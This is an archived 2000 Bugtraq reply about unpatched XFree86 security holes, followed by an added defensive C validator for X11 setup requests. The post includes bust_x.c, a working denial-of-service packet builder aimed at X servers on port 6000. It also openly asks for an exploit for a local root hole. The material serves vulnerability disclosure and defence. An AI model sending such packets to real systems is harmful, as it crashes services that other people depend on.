5636143 2000-10-25  08:52  /119 lines/ Brevbäraren (som är implementerad i) Python
Recipient: Bugtraq (import) <13411>
Comment on text 5601836 by Brevbäraren (som är implementerad i) Python
Subject: Re: another Xlib buffer overflow
------------------------------------------------------------
From: Chris Evans <chris@SCARY.BEASTS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.21.0010242005220.7809-100000@ferret.lmh.ox.ac.uk>

On Sun, 15 Oct 2000, Kris Kennaway wrote:

> On Fri, Oct 13, 2000 at 11:37:01PM +0200, Matthieu Herrb wrote:
>
> > It was fixed in XFree86 4.0. From the CHANGELOG:
> >
> > XFree86 3.9Nu (13 January 1999)
> > [...]
> > 2141. Fix some sun_path overflows in xtrans.
>
> Wow, there's nothing like supporting the product release which
> everyone actually uses.
>
> XFree86 did the same thing with the other security problems a few
> months ago (fixed it silently in 4.0.1 and forced vendors who care to
> manually hunt down and extract the patches from their CVS repo and
> apply them by hand to their 3.3.6 package). Mail to their security
> contact address also went unanswered on this issue..

Hi Kris,

Well, I'm sufficiently underwhelmed by the response to recent XFree
security issues that I'm going to throw some fuel on the fire.

Below is a little packet builder which builds the DoS packet which
you can send to X port 6000. I didn't include it in my original
advisory, which may be located at:

http://www.securityfocus.com/archive/1/60869

However, this advisory contained ample information for a malicious
party to derive an exploit packet. This is why I have no problem
sending my DoS packet builder. Hopefully this post might prompt
action from slower vendors (even if it is inspired by irate users).

As well as the DoS issue, a lot of vendors still have the following X
related issues outstanding (I posted these about the same time as the
original DoS post):

A nasty hole which will almost certainly give localhost root in the
presence of suid-root X clients: [EXPLOIT PLEASE ANYONE?]

http://www.securityfocus.com/archive/1/65699

An irritating libICE DoS, affects GNOME-1.0 desktops:

http://www.securityfocus.com/archive/1/65692 [INCLUDED EXPLOIT]

And, of course, Michal's sun_path overflow which started this thread..


Cheers
Chris

/* bust_x.c
 * Demonstration purposes only!
 * Chris Evans <chris@scary.beasts.org>
 */
#include <string.h>   /* memset */
#include <unistd.h>   /* write */

int
main(int argc, const char* argv[])
{
  char bigbuf[201];
  short s;
  char c;

  c = -120;

  memset(bigbuf, c, sizeof(bigbuf));

  /* Little endian */
  c = 'l';
  write(1, &c, 1);
  /* PAD */
  c = 0;
  write(1, &c, 1);
  /* Major */
  s = 11;
  write(1, &s, 2);
  /* Minor */
  s = 0;
  write(1, &s, 2);
  /* Auth proto len */
  s = 19;
  write(1, &s, 2);
  /* Auth string len */
  s = 200;
  write(1, &s, 2);

  /* PAD */
  s = 0;
  write(1, &s, 2);

  /* Auth name */
  write(1, "XC-QUERY-SECURITY-1", 19);

  /* byte to round to multiple of 4 */
  c = 0;
  write(1, &c, 1);

  /* Auth data */
  /* Site policy please */
  c = 2;
  write(1, &c, 1);
  /* "permit" - doesn't really matter */
  c = 0;
  write(1, &c, 1);
  /* number of policies: -1, loop you sucker:) */
  c = -1;
  write(1, &c, 1);
  /* Negative stringlen.. 201 of them just in case, chortle... */

  write(1, bigbuf, sizeof(bigbuf));
  return 0;
}
(5636143) ------------------------------------------(Reflowed)
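As an added example (not code from Chris Evans's post or from XFree86), here is a bounds-checked reader for the X11 connection-setup request that bust_x.c emits, written from the server's side: every length byte is read as unsigned and checked against the bytes actually present, so the -1 policy count and -120 string lengths the builder writes are rejected instead of driving a loop. The 12-byte header layout follows the builder; the layout of the site-policy block (type, permit flag, count, then length-prefixed strings) is inferred from the builder's comments and is an assumption, and the sample buffers are constructed here, not captured traffic.

```c
/* Added example, not from the post: validate an X11 setup request with
 * XC-QUERY-SECURITY-1 auth data before acting on any count or length in it.
 * Site-policy block layout is assumed from bust_x.c's comments. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p, int le) { return le ? (uint16_t)(p[0] | p[1] << 8) : (uint16_t)(p[0] << 8 | p[1]); }
static size_t pad4(size_t n) { return (n + 3) & ~(size_t)3; }

/* Returns 0 for a well-formed request, otherwise a nonzero reason code.
 * Lengths are unsigned and bounded by what is left in the buffer. */
int check_x11_setup(const uint8_t *buf, size_t len)
{
    int le;
    uint16_t nlen, dlen;
    size_t i, n, pos, slen;
    const uint8_t *d;

    if (len < 12) return 1;                                  /* fixed 12-byte header */
    if (buf[0] == 'l') le = 1; else if (buf[0] == 'B') le = 0; else return 2;
    nlen = rd16(buf + 6, le);                                /* auth protocol name length */
    dlen = rd16(buf + 8, le);                                /* auth data length */
    if (pad4(nlen) > len - 12 || pad4(dlen) > len - 12 - pad4(nlen)) return 3;
    if (nlen != 19 || memcmp(buf + 12, "XC-QUERY-SECURITY-1", 19) != 0) return 0; /* other auth: not inspected here */
    d = buf + 12 + pad4(nlen);
    if (dlen < 3 || d[0] != 2) return 4;                     /* need type, permit flag, count; only site policy (2) handled */
    n = d[2];                                                /* 0xff is 255 policies, never -1 */
    for (i = 0, pos = 3; i < n; i++) {
        if (pos >= dlen) return 5;                           /* count promises more policies than bytes */
        slen = d[pos];                                       /* 0x88 is 136, never negative */
        if (slen > dlen - pos - 1) return 6;                 /* string would run past the auth data */
        pos += 1 + slen;
    }
    return pos == dlen ? 0 : 7;                              /* trailing bytes are rejected too */
}

/* Constructed samples: header, "XC-QUERY-SECURITY-1" plus one pad byte, then policy data. */
#define XC_NAME 'X','C','-','Q','U','E','R','Y','-','S','E','C','U','R','I','T','Y','-','1', 0
static const uint8_t kGood[] = { 'l',0, 11,0, 0,0, 19,0, 7,0, 0,0, XC_NAME, 2, 0, 1, 3,'a','b','c', 0 };
static const uint8_t kBad[]  = { 'l',0, 11,0, 0,0, 19,0, 8,0, 0,0, XC_NAME, 2, 0, 0xff, 0x88,0x88,0x88,0x88,0x88 };

int main(void)
{
    printf("good=%d bad=%d truncated=%d\n", check_x11_setup(kGood, sizeof kGood),
           check_x11_setup(kBad, sizeof kBad), check_x11_setup(kBad, 30));
    return 0;
}
```

kBad carries the same 0xff count and 0x88 length bytes as the builder's -1 and -120, just in a shorter block; the reader stops at the first length that does not fit.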